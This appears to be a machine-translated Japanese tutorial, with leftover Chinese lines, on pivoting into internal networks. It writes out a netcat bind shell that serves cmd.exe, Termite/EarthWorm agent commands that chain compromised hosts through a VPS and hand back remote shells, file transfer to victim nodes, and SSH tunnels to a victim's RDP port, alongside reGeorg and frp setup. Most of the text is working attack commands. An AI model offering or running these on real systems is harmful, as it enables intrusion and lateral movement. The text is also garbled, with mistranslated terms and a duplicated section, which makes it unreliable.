イントラネットプロキシの侵入
イントラネットの浸透を実現するツールは、Earthworm、Termite、reGeorg、nps など多数ありますが、ここでは主に擬似イントラネットを運用するための Termite を紹介します。Termite は EW (EarthWorm) の最新バージョンです。
1.NC工具の使用
Windows で nc を使用するには、nc.exe をインストールする必要があります。
ターゲットドローン
nc.exe -l -p 4444 -t -e cmd.exe
攻撃機
nc.exe 192.168.1.1 4444
Linux で nc を使用するには、netcat の使用法に関するブログのツール使用法の欄を参照してください。
2.シロアリの使用
非常にコンパクトで柔軟なスプリングボード マシンで、従来のソックス プロキシとは異なり、複雑なイントラネット環境への侵入に適しており、操作が非常に簡単です。 Termite はイントラネット侵入ツールであり、管理側の管理者とエージェント側のエージェントに分かれています。複数のプラットフォーム、スプリングボード マシン間の順方向および逆方向のカスケード、組み込みのシェル管理などをサポートします。
-| 指定本地socks端口,等待远程连
-C 指定远程socks机器ip
-p 指定远程socks机器端口
さまざまなシナリオでの使用方法:
1. ターゲットはパブリック ネットワーク内にあります。
目标A:agent_win32.exe -l 8888
攻击PC:admin_win32.exe -c 目标ip -p 8888
2. ターゲットは内部ネットワーク上にありますが、外部ネットワークに接続できます
在vps运行:agent_win32.exe -l 8888
在攻击PC运行:admin_win32.exe -c vps_ip -p 8888
在靶机运行:agent_win32.exe -c vps_ip -p 8888
vps: 仮想プライベートサーバー
3. ターゲットは内部ネットワーク上にあり、外部ネットワークには接続できませんが、vnet1 経由でアクセスできます。
agent间正向连接:
vnet2:
agent_windows_x86.exe -l 8888
vnet1:
agent_windows_x86.exe -l 7777
桥接:
agent_windows_x86.exe -l 6666
攻撃機:
admin_windows_x86.exe -c 192.168.1.144 -p 6666
goto 1
connect 192.168.1.128 7777
goto 2
connect 192.168.10.2 8888
goto 3
shell 4444 #将vnet2的cmd转发到本地的4444端口
nc 127.0.0.1 4444
エージェント間の逆接続:
桥接:
agent_windows_x86.exe -l 6666
vnet1:
agent_windows_x86.exe -l 7777
vnet2:
agent_windows_x86.exe 192.168.10.1 -p 7777
vnet1(新开一个cmd):
agent_windows_x86.exe -c 192.168.1.144 -p 6666
攻击机:
admin_windows_x86.exe -c 10.86.64.236 -p 6666
その他の一般的に使用される関数:
1.ソケットプロキシ
goto 对应id
socks 4444
goto 2 将当前被管理节点切换为 2 号节点。
socks 4444 此时,本地4444 端口会启动个监听服务,而服务提供者为2号节点。
2.シェル管理
shell 4444
nc -v 127.0.0.1 4444
goto 1
shell 4444 此时,通过nc本地的 4444 端口,就可以得到一个 1 节点提供的 shell.
3.ポートフォワーディング
lcxtran 本地端口 目标ip 目标端口
goto 2
lcxtran 3388 10.0.0.1 3389 以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口
4. ファイルのアップロードとダウンロード
upfile 本地文件路径 目标路径
goto 2
upfile 2.txt 3.txt 将本地的 2.txt 上传至 2号节点的目录,并命名为3.txt
downfile 目标文件路径 本地存放路径
goto 1
downfile 1.txt 2.txt 将1 节点,目录下的 1.txt 下载至本地,并命名为2.txt
3.ssh
1. ローカル ポート フォワーディング (スプリングボード マシンには外部ネットワーク アドレスと内部ネットワーク アドレスがあります)
スプリングボード構成
vim /etc/ssh/sshd_config //SSH配置文件
AllowAgentForwarding yes //是否允许转发TCP协议
GatewayPorts yes //是否允许远程主机连接本地转发端口
PermitRootLogin yes //是否允许root用户登陆
PasswordAuthentication yes //是否允许使用基于密码的认证
TCPKeepAlive yes //保持心跳,防止ssh断开
service ssh restart //开启ssh服务
ssh命令参数:
-C 压缩传输,加快传输速度
-f 将SSH转入后台执行,不占用当前的shell
-N 建立静默连接(建立了连接,但是看不到具体会话)
-g 允许远程主机连接到本地用于转发的端口
-L 本地端口转发
-R 远程端口转发
-D 动态转发(socks代理)
-P 指定SSH端口
攻撃機
ssh -CfNg -L 2222:1.1.1.1:3389 [email protected]
//将受害机的3389端口转发到本地2222端口,1.1.1.1是受害机,192.168.1.1跳板机
rdesktop 127.0.0.1:2222 //访问本地2222端口,就是访问受害机的3389端口
2. リモート ポート フォワーディング (スプリングボード マシンには外部ネットワーク アドレスがありませんが、外部ネットワークにアクセスできます)
踏み台マシン
ssh -R 3307:1.1.1.1:3389 [email protected] //1.1.1.1是受害机,192.168.1.9是攻击机
攻撃機
rdesktop 127.0.0.1:3307
3. 動的ポート転送 (スプリングボード マシンには外部ネットワーク アドレスと内部ネットワークがあります)
ssh -D 7000 [email protected] //攻击机与跳板机建立隧道,192.168.1.1是跳板机,root是跳板机的用户名
127.0.0.1 7000 をプロキシとして使用してイントラネット サービスにアクセスできます
4. 他のツールの使用
reGeorg ツールのアドレス:
https://github.com/sensepost/reGeorg
reGeorg は reDuh のアップグレード バージョンで、主に http/https トンネルを介してイントラネット サーバーのポートをローカル マシンに転送してループを形成します。ターゲット サーバーがイントラネット上にある場合、またはポート ポリシーがある場合に、ターゲット サーバーがその内部オープン ポートに接続するために使用されます。 Webshell を使用して、イントラネット侵入用の Socks プロキシを確立します。サーバーは、aspx、php、jsp などの Web プログラムのいずれかをサポートしている必要があります。
sSocks ツールのアドレス:
http://sourceforge.net/projects/ssocks/
sSocks は、Socks プロキシ サービスを有効にするために使用できる Socks プロキシ ツール スイートであり、socks5 検証をサポートし、IPV6 と UDP をサポートし、リモート コンピューターを Socks プロキシ サーバーとして使用してローカル コンピューターにバウンスするリバース Socks プロキシ サービスを提供します。 、イントラネットを大幅に容易にします。ペネトレーション テスト、最新バージョンは 0.0.14 です。
FRPイントラネット侵入ツール
frp は、イントラネットへの侵入に使用できる高性能リバース プロキシ アプリケーションです。tcp、udp、http、https プロトコルをサポートします。
ツールアドレス:
https://github.com/fatedier/frp
イントラネット上またはファイアウォールの背後にあるマシンを使用して、http または https サービスを外部ネットワーク環境に提供します。
http および https サービスの場合、ドメイン名ベースの仮想ホストとカスタム ドメイン名のバインドがサポートされているため、複数のドメイン名がポート 80 を共有できます。
イントラネット上またはファイアウォールの背後にあるマシンを使用して、自宅の ssh を介して会社のイントラネット環境のホストにアクセスするなど、外部ネットワーク環境に tcp および udp サービスを提供します。
主な文書の紹介:
frpc.exe-----------客户端
frpc.ini------------客户端配置文件
frps.exe------------服务端
frps.ini-------------服务器配置文件
構成も比較的単純です。
サーバー構成で必要なのは、リスニング ポートの構成のみです。
[common]
bind_port = 7000
クライアント構成:
[common]
server_addr = 127.0.0.1
server_port = 7000
走る:
サーバー上でコマンドを実行します。
.\frps -c ./frps.ini
クライアント実行コマンド:
.\frpc -c ./frpc.ini
他にも次のようなツールがあります
lcx,Ngrok,EW,reGeirg
これも比較的簡単です。
サーバー構成で必要なのは、リスニング ポートの構成のみです。
[common]
bind_port = 7000
クライアント構成:
[common]
server_addr = 127.0.0.1
server_port = 7000
走る:
サーバー上でコマンドを実行します。
.\frps -c ./frps.ini
クライアント実行コマンド:
.\frpc -c ./frpc.ini
他にも次のようなツールがあります
lcx,Ngrok,EW,reGeirg
リバースプロキシツールを待つ